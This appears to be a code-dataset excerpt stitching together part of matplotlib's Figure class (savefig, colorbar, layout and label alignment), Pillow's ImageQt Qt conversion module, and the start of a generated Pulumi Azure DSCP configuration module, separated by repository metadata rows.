The following kwargs are supported for ensuring the returned axes
adheres to the given projection etc., and for axes creation if
the active axes does not exist:
%(Axes)s
"""
ckey, cax = self._axstack.current_key_axes()
# if there exists an axes on the stack see if it matches
# the desired axes configuration
if cax is not None:
# if no kwargs are given just return the current axes
# this is a convenience for gca() on axes such as polar etc.
if not kwargs:
return cax
# if the user has specified particular projection detail
# then build up a key which can represent this
else:
projection_class, _, key = \
self._process_projection_requirements(**kwargs)
# let the returned axes have any gridspec by removing it from
# the key
ckey = ckey[1:]
key = key[1:]
# if the cax matches this key then return the axes, otherwise
# continue and a new axes will be created
if key == ckey and isinstance(cax, projection_class):
return cax
else:
cbook._warn_external('Requested projection is different '
'from current axis projection, '
'creating new axis with requested '
'projection.')
# no axes found, so create one which spans the figure
return self.add_subplot(1, 1, 1, **kwargs)
def sca(self, a):
"""Set the current axes to be a and return a."""
self._axstack.bubble(a)
for func in self._axobservers:
func(self)
return a
def _gci(self):
"""
Helper for :func:`~matplotlib.pyplot.gci`. Do not use elsewhere.
"""
# Look first for an image in the current Axes:
cax = self._axstack.current_key_axes()[1]
if cax is None:
return None
im = cax._gci()
if im is not None:
return im
# If there is no image in the current Axes, search for
# one in a previously created Axes. Whether this makes
# sense is debatable, but it is the documented behavior.
for ax in reversed(self.axes):
im = ax._gci()
if im is not None:
return im
return None
def __getstate__(self):
state = super().__getstate__()
# the axobservers cannot currently be pickled.
# Additionally, the canvas cannot currently be pickled, but this has
# the benefit of meaning that a figure can be detached from one canvas,
# and re-attached to another.
for attr_to_pop in ('_axobservers', 'show',
'canvas', '_cachedRenderer'):
state.pop(attr_to_pop, None)
# add version information to the state
state['__mpl_version__'] = _mpl_version
# check whether the figure manager (if any) is registered with pyplot
from matplotlib import _pylab_helpers
if getattr(self.canvas, 'manager', None) \
in _pylab_helpers.Gcf.figs.values():
state['_restore_to_pylab'] = True
# set all the layoutbox information to None. kiwisolver objects can't
# be pickled, so we lose the layout options at this point.
state.pop('_layoutbox', None)
# suptitle:
if self._suptitle is not None:
self._suptitle._layoutbox = None
return state
def __setstate__(self, state):
version = state.pop('__mpl_version__')
restore_to_pylab = state.pop('_restore_to_pylab', False)
if version != _mpl_version:
cbook._warn_external(
f"This figure was saved with matplotlib version {version} and "
f"is unlikely to function correctly.")
self.__dict__ = state
# re-initialise some of the unstored state information
self._axobservers = []
self.canvas = None
self._layoutbox = None
if restore_to_pylab:
# lazy import to avoid circularity
import matplotlib.pyplot as plt
import matplotlib._pylab_helpers as pylab_helpers
allnums = plt.get_fignums()
num = max(allnums) + 1 if allnums else 1
mgr = plt._backend_mod.new_figure_manager_given_figure(num, self)
# XXX The following is a copy and paste from pyplot. Consider
# factoring to pylab_helpers
if self.get_label():
mgr.set_window_title(self.get_label())
# make this figure current on button press event
def make_active(event):
pylab_helpers.Gcf.set_active(mgr)
mgr._cidgcf = mgr.canvas.mpl_connect('button_press_event',
make_active)
pylab_helpers.Gcf.set_active(mgr)
self.number = num
plt.draw_if_interactive()
self.stale = True
def add_axobserver(self, func):
"""Whenever the axes state change, ``func(self)`` will be called."""
self._axobservers.append(func)
def savefig(self, fname, *, transparent=None, **kwargs):
"""
Save the current figure.
Call signature::
savefig(fname, dpi=None, facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format=None,
transparent=False, bbox_inches=None, pad_inches=0.1,
frameon=None, metadata=None)
The output formats available depend on the backend being used.
Parameters
----------
fname : str or PathLike or file-like object
A path, or a Python file-like object, or
possibly some backend-dependent object such as
`matplotlib.backends.backend_pdf.PdfPages`.
If *format* is not set, then the output format is inferred from
the extension of *fname*, if any, and from :rc:`savefig.format`
otherwise. If *format* is set, it determines the output format.
Hence, if *fname* is not a path or has no extension, remember to
specify *format* to ensure that the correct backend is used.
Other Parameters
----------------
dpi : [ *None* | scalar > 0 | 'figure' ]
The resolution in dots per inch. If *None*, defaults to
:rc:`savefig.dpi`. If 'figure', uses the figure's dpi value.
quality : [ *None* | 1 <= scalar <= 100 ]
The image quality, on a scale from 1 (worst) to 95 (best).
Applicable only if *format* is jpg or jpeg, ignored otherwise.
If *None*, defaults to :rc:`savefig.jpeg_quality` (95 by default).
Values above 95 should be avoided; 100 completely disables the
JPEG quantization stage.
optimize : bool
If *True*, indicates that the JPEG encoder should make an extra
pass over the image in order to select optimal encoder settings.
Applicable only if *format* is jpg or jpeg, ignored otherwise.
Is *False* by default.
progressive : bool
If *True*, indicates that this image should be stored as a
progressive JPEG file. Applicable only if *format* is jpg or
jpeg, ignored otherwise. Is *False* by default.
facecolor : color or None, optional
The facecolor of the figure; if *None*, defaults to
:rc:`savefig.facecolor`.
edgecolor : color or None, optional
The edgecolor of the figure; if *None*, defaults to
:rc:`savefig.edgecolor`
orientation : {'landscape', 'portrait'}
Currently only supported by the postscript backend.
papertype : str
One of 'letter', 'legal', 'executive', 'ledger', 'a0' through
'a10', 'b0' through 'b10'. Only supported for postscript
output.
format : str
The file format, e.g. 'png', 'pdf', 'svg', ... The behavior when
this is unset is documented under *fname*.
transparent : bool
If *True*, the axes patches will all be transparent; the
figure patch will also be transparent unless facecolor
and/or edgecolor are specified via kwargs.
This is useful, for example, for displaying
a plot on top of a colored background on a web page. The
transparency of these patches will be restored to their
original values upon exit of this function.
bbox_inches : str or `~matplotlib.transforms.Bbox`, optional
Bbox in inches. Only the given portion of the figure is
saved. If 'tight', try to figure out the tight bbox of
the figure. If None, use savefig.bbox
pad_inches : scalar, optional
Amount of padding around the figure when bbox_inches is
'tight'. If None, use savefig.pad_inches
bbox_extra_artists : list of `~matplotlib.artist.Artist`, optional
A list of extra artists that will be considered when the
tight bbox is calculated.
metadata : dict, optional
Key/value pairs to store in the image metadata. The supported keys
and defaults depend on the image format and backend:
- 'png' with Agg backend: See the parameter ``metadata`` of
`~.FigureCanvasAgg.print_png`.
- 'pdf' with pdf backend: See the parameter ``metadata`` of
`~.backend_pdf.PdfPages`.
- 'eps' and 'ps' with PS backend: Only 'Creator' is supported.
pil_kwargs : dict, optional
Additional keyword arguments that are passed to `PIL.Image.save`
when saving the figure. Only applicable for formats that are saved
using Pillow, i.e. JPEG, TIFF, and (if the keyword is set to a
non-None value) PNG.
"""
kwargs.setdefault('dpi', rcParams['savefig.dpi'])
if "frameon" in kwargs:
cbook.warn_deprecated("3.1", name="frameon", obj_type="kwarg",
alternative="facecolor")
frameon = kwargs.pop("frameon")
if frameon is None:
frameon = dict.__getitem__(rcParams, 'savefig.frameon')
else:
frameon = False # Won't pass "if frameon:" below.
if transparent is None:
transparent = rcParams['savefig.transparent']
if transparent:
kwargs.setdefault('facecolor', 'none')
kwargs.setdefault('edgecolor', 'none')
original_axes_colors = []
for ax in self.axes:
patch = ax.patch
original_axes_colors.append((patch.get_facecolor(),
patch.get_edgecolor()))
patch.set_facecolor('none')
patch.set_edgecolor('none')
else:
kwargs.setdefault('facecolor', rcParams['savefig.facecolor'])
kwargs.setdefault('edgecolor', rcParams['savefig.edgecolor'])
if frameon:
original_frameon = self.patch.get_visible()
self.patch.set_visible(frameon)
self.canvas.print_figure(fname, **kwargs)
if frameon:
self.patch.set_visible(original_frameon)
if transparent:
for ax, cc in zip(self.axes, original_axes_colors):
ax.patch.set_facecolor(cc[0])
ax.patch.set_edgecolor(cc[1])
@docstring.dedent_interpd
def colorbar(self, mappable, cax=None, ax=None, use_gridspec=True, **kw):
"""
Create a colorbar for a ScalarMappable instance, *mappable*.
Documentation for the pyplot thin wrapper:
%(colorbar_doc)s
"""
if ax is None:
ax = self.gca()
# Store the value of gca so that we can set it back later on.
current_ax = self.gca()
if cax is None:
if use_gridspec and isinstance(ax, SubplotBase) \
and (not self.get_constrained_layout()):
cax, kw = cbar.make_axes_gridspec(ax, **kw)
else:
cax, kw = cbar.make_axes(ax, **kw)
# need to remove kws that cannot be passed to Colorbar
NON_COLORBAR_KEYS = ['fraction', 'pad', 'shrink', 'aspect', 'anchor',
'panchor']
cb_kw = {k: v for k, v in kw.items() if k not in NON_COLORBAR_KEYS}
cb = cbar.colorbar_factory(cax, mappable, **cb_kw)
self.sca(current_ax)
self.stale = True
return cb
def subplots_adjust(self, left=None, bottom=None, right=None, top=None,
wspace=None, hspace=None):
"""
Update the :class:`SubplotParams` with *kwargs* (defaulting to rc when
*None*) and update the subplot locations.
"""
if self.get_constrained_layout():
self.set_constrained_layout(False)
cbook._warn_external("This figure was using "
"constrained_layout==True, but that is "
"incompatible with subplots_adjust and or "
"tight_layout: setting "
"constrained_layout==False. ")
self.subplotpars.update(left, bottom, right, top, wspace, hspace)
for ax in self.axes:
if not isinstance(ax, SubplotBase):
# Check if sharing a subplots axis
if isinstance(ax._sharex, SubplotBase):
ax._sharex.update_params()
ax.set_position(ax._sharex.figbox)
elif isinstance(ax._sharey, SubplotBase):
ax._sharey.update_params()
ax.set_position(ax._sharey.figbox)
else:
ax.update_params()
ax.set_position(ax.figbox)
self.stale = True
def ginput(self, n=1, timeout=30, show_clicks=True, mouse_add=1,
mouse_pop=3, mouse_stop=2):
"""
Blocking call to interact with a figure.
Wait until the user clicks *n* times on the figure, and return the
coordinates of each click in a list.
There are three possible interactions:
- Add a point.
- Remove the most recently added point.
- Stop the interaction and return the points added so far.
The actions are assigned to mouse buttons via the arguments
*mouse_add*, *mouse_pop* and *mouse_stop*. Mouse buttons are defined
by the numbers:
- 1: left mouse button
- 2: middle mouse button
- 3: right mouse button
- None: no mouse button
Parameters
----------
n : int, optional, default: 1
Number of mouse clicks to accumulate. If negative, accumulate
clicks until the input is terminated manually.
timeout : scalar, optional, default: 30
Number of seconds to wait before timing out. If zero or negative
will never timeout.
show_clicks : bool, optional, default: True
If True, show a red cross at the location of each click.
mouse_add : {1, 2, 3, None}, optional, default: 1 (left click)
Mouse button used to add points.
mouse_pop : {1, 2, 3, None}, optional, default: 3 (right click)
Mouse button used to remove the most recently added point.
mouse_stop : {1, 2, 3, None}, optional, default: 2 (middle click)
Mouse button used to stop input.
Returns
-------
points : list of tuples
A list of the clicked (x, y) coordinates.
Notes
-----
The keyboard can also be used to select points in case your mouse
does not have one or more of the buttons. The delete and backspace
keys act like right clicking (i.e., remove last point), the enter key
terminates input and any other key (not already used by the window
manager) selects a point.
"""
blocking_mouse_input = BlockingMouseInput(self,
mouse_add=mouse_add,
mouse_pop=mouse_pop,
mouse_stop=mouse_stop)
return blocking_mouse_input(n=n, timeout=timeout,
show_clicks=show_clicks)
def waitforbuttonpress(self, timeout=-1):
"""
Blocking call to interact with the figure.
This will return True is a key was pressed, False if a mouse
button was pressed and None if *timeout* was reached without
either being pressed.
If *timeout* is negative, does not timeout.
"""
blocking_input = BlockingKeyMouseInput(self)
return blocking_input(timeout=timeout)
def get_default_bbox_extra_artists(self):
bbox_artists = [artist for artist in self.get_children()
if (artist.get_visible() and artist.get_in_layout())]
for ax in self.axes:
if ax.get_visible():
bbox_artists.extend(ax.get_default_bbox_extra_artists())
return bbox_artists
def get_tightbbox(self, renderer, bbox_extra_artists=None):
"""
Return a (tight) bounding box of the figure in inches.
Artists that have ``artist.set_in_layout(False)`` are not included
in the bbox.
Parameters
----------
renderer : `.RendererBase` instance
renderer that will be used to draw the figures (i.e.
``fig.canvas.get_renderer()``)
bbox_extra_artists : list of `.Artist` or ``None``
List of artists to include in the tight bounding box. If
``None`` (default), then all artist children of each axes are
included in the tight bounding box.
Returns
-------
bbox : `.BboxBase`
containing the bounding box (in figure inches).
"""
bb = []
if bbox_extra_artists is None:
artists = self.get_default_bbox_extra_artists()
else:
artists = bbox_extra_artists
for a in artists:
bbox = a.get_tightbbox(renderer)
if bbox is not None and (bbox.width != 0 or bbox.height != 0):
bb.append(bbox)
for ax in self.axes:
if ax.get_visible():
# some axes don't take the bbox_extra_artists kwarg so we
# need this conditional....
try:
bbox = ax.get_tightbbox(renderer,
bbox_extra_artists=bbox_extra_artists)
except TypeError:
bbox = ax.get_tightbbox(renderer)
bb.append(bbox)
bb = [b for b in bb
if (np.isfinite(b.width) and np.isfinite(b.height)
and (b.width != 0 or b.height != 0))]
if len(bb) == 0:
return self.bbox_inches
_bbox = Bbox.union(bb)
bbox_inches = TransformedBbox(_bbox, Affine2D().scale(1 / self.dpi))
return bbox_inches
def init_layoutbox(self):
"""Initialize the layoutbox for use in constrained_layout."""
if self._layoutbox is None:
self._layoutbox = layoutbox.LayoutBox(parent=None,
name='figlb',
artist=self)
self._layoutbox.constrain_geometry(0., 0., 1., 1.)
def execute_constrained_layout(self, renderer=None):
"""
Use ``layoutbox`` to determine pos positions within axes.
See also `.set_constrained_layout_pads`.
"""
from matplotlib._constrained_layout import do_constrained_layout
_log.debug('Executing constrainedlayout')
if self._layoutbox is None:
cbook._warn_external("Calling figure.constrained_layout, but "
"figure not setup to do constrained layout. "
" You either called GridSpec without the "
"fig keyword, you are using plt.subplot, "
"or you need to call figure or subplots "
"with the constrained_layout=True kwarg.")
return
w_pad, h_pad, wspace, hspace = self.get_constrained_layout_pads()
# convert to unit-relative lengths
fig = self
width, height = fig.get_size_inches()
w_pad = w_pad / width
h_pad = h_pad / height
if renderer is None:
renderer = layoutbox.get_renderer(fig)
do_constrained_layout(fig, renderer, h_pad, w_pad, hspace, wspace)
def tight_layout(self, renderer=None, pad=1.08, h_pad=None, w_pad=None,
rect=None):
"""
Automatically adjust subplot parameters to give specified padding.
To exclude an artist on the axes from the bounding box calculation
that determines the subplot parameters (i.e. legend, or annotation),
then set `a.set_in_layout(False)` for that artist.
Parameters
----------
renderer : subclass of `~.backend_bases.RendererBase`, optional
Defaults to the renderer for the figure.
pad : float, optional
Padding between the figure edge and the edges of subplots,
as a fraction of the font size.
h_pad, w_pad : float, optional
Padding (height/width) between edges of adjacent subplots,
as a fraction of the font size. Defaults to *pad*.
rect : tuple (left, bottom, right, top), optional
A rectangle (left, bottom, right, top) in the normalized
figure coordinate that the whole subplots area (including
labels) will fit into. Default is (0, 0, 1, 1).
See Also
--------
.Figure.set_tight_layout
.pyplot.tight_layout
"""
from .tight_layout import (
get_renderer, get_subplotspec_list, get_tight_layout_figure)
subplotspec_list = get_subplotspec_list(self.axes)
if None in subplotspec_list:
cbook._warn_external("This figure includes Axes that are not "
"compatible with tight_layout, so results "
"might be incorrect.")
if renderer is None:
renderer = get_renderer(self)
kwargs = get_tight_layout_figure(
self, self.axes, subplotspec_list, renderer,
pad=pad, h_pad=h_pad, w_pad=w_pad, rect=rect)
if kwargs:
self.subplots_adjust(**kwargs)
def align_xlabels(self, axs=None):
"""
Align the ylabels of subplots in the same subplot column if label
alignment is being done automatically (i.e. the label position is
not manually set).
Alignment persists for draw events after this is called.
If a label is on the bottom, it is aligned with labels on axes that
also have their label on the bottom and that have the same
bottom-most subplot row. If the label is on the top,
it is aligned with labels on axes with the same top-most row.
Parameters
----------
axs : list of `~matplotlib.axes.Axes`
Optional list of (or ndarray) `~matplotlib.axes.Axes`
to align the xlabels.
Default is to align all axes on the figure.
See Also
--------
matplotlib.figure.Figure.align_ylabels
matplotlib.figure.Figure.align_labels
Notes
-----
This assumes that ``axs`` are from the same `.GridSpec`, so that
their `.SubplotSpec` positions correspond to figure positions.
Examples
--------
Example with rotated xtick labels::
fig, axs = plt.subplots(1, 2)
for tick in axs[0].get_xticklabels():
tick.set_rotation(55)
axs[0].set_xlabel('XLabel 0')
axs[1].set_xlabel('XLabel 1')
fig.align_xlabels()
"""
if axs is None:
axs = self.axes
axs = np.asarray(axs).ravel()
for ax in axs:
_log.debug(' Working on: %s', ax.get_xlabel())
ss = ax.get_subplotspec()
nrows, ncols, row0, row1, col0, col1 = ss.get_rows_columns()
labpo = ax.xaxis.get_label_position() # top or bottom
# loop through other axes, and search for label positions
# that are same as this one, and that share the appropriate
# row number.
# Add to a grouper associated with each axes of sibblings.
# This list is inspected in `axis.draw` by
# `axis._update_label_position`.
for axc in axs:
if axc.xaxis.get_label_position() == labpo:
ss = axc.get_subplotspec()
nrows, ncols, rowc0, rowc1, colc, col1 = \
ss.get_rows_columns()
if (labpo == 'bottom' and rowc1 == row1 or
labpo == 'top' and rowc0 == row0):
# grouper for groups of xlabels to align
self._align_xlabel_grp.join(ax, axc)
def align_ylabels(self, axs=None):
"""
Align the ylabels of subplots in the same subplot column if label
alignment is being done automatically (i.e. the label position is
not manually set).
Alignment persists for draw events after this is called.
If a label is on the left, it is aligned with labels on axes that
also have their label on the left and that have the same
left-most subplot column. If the label is on the right,
it is aligned with labels on axes with the same right-most column.
Parameters
----------
axs : list of `~matplotlib.axes.Axes`
Optional list (or ndarray) of `~matplotlib.axes.Axes`
to align the ylabels.
Default is to align all axes on the figure.
See Also
--------
matplotlib.figure.Figure.align_xlabels
matplotlib.figure.Figure.align_labels
Notes
-----
This assumes that ``axs`` are from the same `.GridSpec`, so that
their `.SubplotSpec` positions correspond to figure positions.
Examples
--------
Example with large yticks labels::
fig, axs = plt.subplots(2, 1)
axs[0].plot(np.arange(0, 1000, 50))
axs[0].set_ylabel('YLabel 0')
axs[1].set_ylabel('YLabel 1')
fig.align_ylabels()
"""
if axs is None:
axs = self.axes
axs = np.asarray(axs).ravel()
for ax in axs:
_log.debug(' Working on: %s', ax.get_ylabel())
ss = ax.get_subplotspec()
nrows, ncols, row0, row1, col0, col1 = ss.get_rows_columns()
labpo = ax.yaxis.get_label_position() # left or right
# loop through other axes, and search for label positions
# that are same as this one, and that share the appropriate
# column number.
# Add to a list associated with each axes of sibblings.
# This list is inspected in `axis.draw` by
# `axis._update_label_position`.
for axc in axs:
if axc != ax:
if axc.yaxis.get_label_position() == labpo:
ss = axc.get_subplotspec()
nrows, ncols, row0, row1, colc0, colc1 = \
ss.get_rows_columns()
if (labpo == 'left' and colc0 == col0 or
labpo == 'right' and colc1 == col1):
# grouper for groups of ylabels to align
self._align_ylabel_grp.join(ax, axc)
def align_labels(self, axs=None):
"""
Align the xlabels and ylabels of subplots with the same subplots
row or column (respectively) if label alignment is being
done automatically (i.e. the label position is not manually set).
Alignment persists for draw events after this is called.
Parameters
----------
axs : list of `~matplotlib.axes.Axes`
Optional list (or ndarray) of `~matplotlib.axes.Axes`
to align the labels.
Default is to align all axes on the figure.
See Also
--------
matplotlib.figure.Figure.align_xlabels
matplotlib.figure.Figure.align_ylabels
"""
self.align_xlabels(axs=axs)
self.align_ylabels(axs=axs)
def add_gridspec(self, nrows, ncols, **kwargs):
"""
Return a `.GridSpec` that has this figure as a parent. This allows
complex layout of axes in the figure.
Parameters
----------
nrows : int
Number of rows in grid.
ncols : int
Number or columns in grid.
Returns
-------
gridspec : `.GridSpec`
Other Parameters
----------------
**kwargs
Keyword arguments are passed to `.GridSpec`.
See Also
--------
matplotlib.pyplot.subplots
Examples
--------
Adding a subplot that spans two rows::
fig = plt.figure()
gs = fig.add_gridspec(2, 2)
ax1 = fig.add_subplot(gs[0, 0])
ax2 = fig.add_subplot(gs[1, 0])
# spans two rows:
ax3 = fig.add_subplot(gs[:, 1])
"""
_ = kwargs.pop('figure', None) # pop in case user has added this...
gs = GridSpec(nrows=nrows, ncols=ncols, figure=self, **kwargs)
self._gridspecs.append(gs)
return gs
def figaspect(arg):
"""
Calculate the width and height for a figure with a specified aspect ratio.
While the height is taken from :rc:`figure.figsize`, the width is
adjusted to match the desired aspect ratio. Additionally, it is ensured
that the width is in the range [4., 16.] and the height is in the range
[2., 16.]. If necessary, the default height is adjusted to ensure this.
Parameters
----------
arg : scalar or 2d array
If a scalar, this defines the aspect ratio (i.e. the ratio height /
width).
In case of an array the aspect ratio is number of rows / number of
columns, so that the array could be fitted in the figure undistorted.
Returns
-------
width, height
The figure size in inches.
Notes
-----
If you want to create an axes within the figure, that still preserves the
aspect ratio, be sure to create it with equal width and height. See
examples below.
Thanks to Fernando Perez for this function.
Examples
--------
Make a figure twice as tall as it is wide::
w, h = figaspect(2.)
fig = Figure(figsize=(w, h))
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax.imshow(A, **kwargs)
Make a figure with the proper aspect for an array::
A = rand(5, 3)
w, h = figaspect(A)
fig = Figure(figsize=(w, h))
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax.imshow(A, **kwargs)
"""
isarray = hasattr(arg, 'shape') and not np.isscalar(arg)
# min/max sizes to respect when autoscaling. If John likes the idea, they
# could become rc parameters, for now they're hardwired.
figsize_min = np.array((4.0, 2.0)) # min length for width/height
figsize_max = np.array((16.0, 16.0)) # max length for width/height
# Extract the aspect ratio of the array
if isarray:
nr, nc = arg.shape[:2]
arr_ratio = nr / nc
else:
arr_ratio = arg
# Height of user figure defaults
fig_height = rcParams['figure.figsize'][1]
# New size for the figure, keeping the aspect ratio of the caller
newsize = np.array((fig_height / arr_ratio, fig_height))
# Sanity checks, don't drop either dimension below figsize_min
newsize /= min(1.0, *(newsize / figsize_min))
# Avoid humongous windows as well
newsize /= max(1.0, *(newsize / figsize_max))
# Finally, if we have a really funky aspect ratio, break it but respect
# the min/max dimensions (we don't want figures 10 feet tall!)
newsize = np.clip(newsize, figsize_min, figsize_max)
return newsize
docstring.interpd.update(Figure=martist.kwdoc(Figure))
| [
"[email protected]"
] | |
6733aab9ea53e9cbe7a36f8c18521ad328708815 | fbbe424559f64e9a94116a07eaaa555a01b0a7bb | /pytorch/source/PIL/ImageQt.py | b747781c50bd2eede24eb9145a6224a4a90712ff | [
"MIT"
] | permissive | ryfeus/lambda-packs | 6544adb4dec19b8e71d75c24d8ed789b785b0369 | cabf6e4f1970dc14302f87414f170de19944bac2 | refs/heads/master | 2022-12-07T16:18:52.475504 | 2022-11-29T13:35:35 | 2022-11-29T13:35:35 | 71,386,735 | 1,283 | 263 | MIT | 2022-11-26T05:02:14 | 2016-10-19T18:22:39 | Python | UTF-8 | Python | false | false | 6,558 | py | #
# The Python Imaging Library.
# $Id$
#
# a simple Qt image interface.
#
# history:
# 2006-06-03 fl: created
# 2006-06-04 fl: inherit from QImage instead of wrapping it
# 2006-06-05 fl: removed toimage helper; move string support to ImageQt
# 2013-11-13 fl: add support for Qt5 ([email protected])
#
# Copyright (c) 2006 by Secret Labs AB
# Copyright (c) 2006 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from . import Image
from ._util import isPath, py3
from io import BytesIO
import sys
qt_versions = [
['5', 'PyQt5'],
['side2', 'PySide2'],
['4', 'PyQt4'],
['side', 'PySide']
]
# If a version has already been imported, attempt it first
qt_versions.sort(key=lambda qt_version: qt_version[1] in sys.modules,
reverse=True)
for qt_version, qt_module in qt_versions:
try:
if qt_module == 'PyQt5':
from PyQt5.QtGui import QImage, qRgba, QPixmap
from PyQt5.QtCore import QBuffer, QIODevice
elif qt_module == 'PySide2':
from PySide2.QtGui import QImage, qRgba, QPixmap
from PySide2.QtCore import QBuffer, QIODevice
elif qt_module == 'PyQt4':
from PyQt4.QtGui import QImage, qRgba, QPixmap
from PyQt4.QtCore import QBuffer, QIODevice
elif qt_module == 'PySide':
from PySide.QtGui import QImage, qRgba, QPixmap
from PySide.QtCore import QBuffer, QIODevice
except (ImportError, RuntimeError):
continue
qt_is_installed = True
break
else:
qt_is_installed = False
qt_version = None
def rgb(r, g, b, a=255):
"""(Internal) Turns an RGB color into a Qt compatible color integer."""
# use qRgb to pack the colors, and then turn the resulting long
# into a negative integer with the same bitpattern.
return (qRgba(r, g, b, a) & 0xffffffff)
def fromqimage(im):
"""
:param im: A PIL Image object, or a file name
(given either as Python string or a PyQt string object)
"""
buffer = QBuffer()
buffer.open(QIODevice.ReadWrite)
# preserve alha channel with png
# otherwise ppm is more friendly with Image.open
if im.hasAlphaChannel():
im.save(buffer, 'png')
else:
im.save(buffer, 'ppm')
b = BytesIO()
try:
b.write(buffer.data())
except TypeError:
# workaround for Python 2
b.write(str(buffer.data()))
buffer.close()
b.seek(0)
return Image.open(b)
def fromqpixmap(im):
return fromqimage(im)
# buffer = QBuffer()
# buffer.open(QIODevice.ReadWrite)
# # im.save(buffer)
# # What if png doesn't support some image features like animation?
# im.save(buffer, 'ppm')
# bytes_io = BytesIO()
# bytes_io.write(buffer.data())
# buffer.close()
# bytes_io.seek(0)
# return Image.open(bytes_io)
def align8to32(bytes, width, mode):
"""
converts each scanline of data from 8 bit to 32 bit aligned
"""
bits_per_pixel = {
'1': 1,
'L': 8,
'P': 8,
}[mode]
# calculate bytes per line and the extra padding if needed
bits_per_line = bits_per_pixel * width
full_bytes_per_line, remaining_bits_per_line = divmod(bits_per_line, 8)
bytes_per_line = full_bytes_per_line + (1 if remaining_bits_per_line else 0)
extra_padding = -bytes_per_line % 4
# already 32 bit aligned by luck
if not extra_padding:
return bytes
new_data = []
for i in range(len(bytes) // bytes_per_line):
new_data.append(bytes[i*bytes_per_line:(i+1)*bytes_per_line]
+ b'\x00' * extra_padding)
return b''.join(new_data)
def _toqclass_helper(im):
data = None
colortable = None
# handle filename, if given instead of image name
if hasattr(im, "toUtf8"):
# FIXME - is this really the best way to do this?
if py3:
im = str(im.toUtf8(), "utf-8")
else:
im = unicode(im.toUtf8(), "utf-8") # noqa: F821
if isPath(im):
im = Image.open(im)
if im.mode == "1":
format = QImage.Format_Mono
elif im.mode == "L":
format = QImage.Format_Indexed8
colortable = []
for i in range(256):
colortable.append(rgb(i, i, i))
elif im.mode == "P":
format = QImage.Format_Indexed8
colortable = []
palette = im.getpalette()
for i in range(0, len(palette), 3):
colortable.append(rgb(*palette[i:i+3]))
elif im.mode == "RGB":
data = im.tobytes("raw", "BGRX")
format = QImage.Format_RGB32
elif im.mode == "RGBA":
try:
data = im.tobytes("raw", "BGRA")
except SystemError:
# workaround for earlier versions
r, g, b, a = im.split()
im = Image.merge("RGBA", (b, g, r, a))
format = QImage.Format_ARGB32
else:
raise ValueError("unsupported image mode %r" % im.mode)
__data = data or align8to32(im.tobytes(), im.size[0], im.mode)
return {
'data': __data, 'im': im, 'format': format, 'colortable': colortable
}
if qt_is_installed:
class ImageQt(QImage):
def __init__(self, im):
"""
An PIL image wrapper for Qt. This is a subclass of PyQt's QImage
class.
:param im: A PIL Image object, or a file name (given either as
Python string or a PyQt string object).
"""
im_data = _toqclass_helper(im)
# must keep a reference, or Qt will crash!
# All QImage constructors that take data operate on an existing
# buffer, so this buffer has to hang on for the life of the image.
# Fixes https://github.com/python-pillow/Pillow/issues/1370
self.__data = im_data['data']
QImage.__init__(self,
self.__data, im_data['im'].size[0],
im_data['im'].size[1], im_data['format'])
if im_data['colortable']:
self.setColorTable(im_data['colortable'])
def toqimage(im):
return ImageQt(im)
def toqpixmap(im):
# # This doesn't work. For now using a dumb approach.
# im_data = _toqclass_helper(im)
# result = QPixmap(im_data['im'].size[0], im_data['im'].size[1])
# result.loadFromData(im_data['data'])
# Fix some strange bug that causes
if im.mode == 'RGB':
im = im.convert('RGBA')
qimage = toqimage(im)
return QPixmap.fromImage(qimage)
| [
"[email protected]"
] | |
b7174ad5e70aad83997120f3f26a0af8c31902f4 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/network/v20210501/get_dscp_configuration.py | 1dde2dd4b7042811e658cde1bbc7524c32f1811b | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,569 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetDscpConfigurationResult',
'AwaitableGetDscpConfigurationResult',
'get_dscp_configuration',
'get_dscp_configuration_output',
]
@pulumi.output_type
class GetDscpConfigurationResult:
"""
Differentiated Services Code Point configuration for any given network interface
"""
def __init__(__self__, associated_network_interfaces=None, destination_ip_ranges=None, destination_port_ranges=None, etag=None, id=None, location=None, markings=None, name=None, protocol=None, provisioning_state=None, qos_collection_id=None, qos_definition_collection=None, resource_guid=None, source_ip_ranges=None, source_port_ranges=None, tags=None, type=None):
if associated_network_interfaces and not isinstance(associated_network_interfaces, list):
raise TypeError("Expected argument 'associated_network_interfaces' to be a list")
pulumi.set(__self__, "associated_network_interfaces", associated_network_interfaces)
if destination_ip_ranges and not isinstance(destination_ip_ranges, list):
raise TypeError("Expected argument 'destination_ip_ranges' to be a list")
pulumi.set(__self__, "destination_ip_ranges", destination_ip_ranges)
if destination_port_ranges and not isinstance(destination_port_ranges, list):
raise TypeError("Expected argument 'destination_port_ranges' to be a list")
pulumi.set(__self__, "destination_port_ranges", destination_port_ranges)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if markings and not isinstance(markings, list):
raise TypeError("Expected argument 'markings' to be a list")
pulumi.set(__self__, "markings", markings)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if protocol and not isinstance(protocol, str):
raise TypeError("Expected argument 'protocol' to be a str")
pulumi.set(__self__, "protocol", protocol)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if qos_collection_id and not isinstance(qos_collection_id, str):
raise TypeError("Expected argument 'qos_collection_id' to be a str")
pulumi.set(__self__, "qos_collection_id", qos_collection_id)
